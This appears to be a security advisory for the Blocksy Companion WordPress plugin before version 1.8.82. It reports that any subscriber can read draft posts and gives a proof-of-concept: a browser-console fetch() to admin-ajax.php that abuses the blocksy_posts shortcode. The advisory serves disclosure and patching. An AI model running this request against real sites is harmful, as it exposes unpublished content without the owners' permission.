Blocksy Companion < 1.8.82 - Subscriber+ Draft Post Access

The plugin does not ensure that posts to be accessed via a shortcode are already public and can be viewed, allowing any authenticated users, such as subscriber to access draft posts for example

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[blocksy_posts post_ids=‘518’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); The title and content of the draft post with ID 518 will be displayed in the response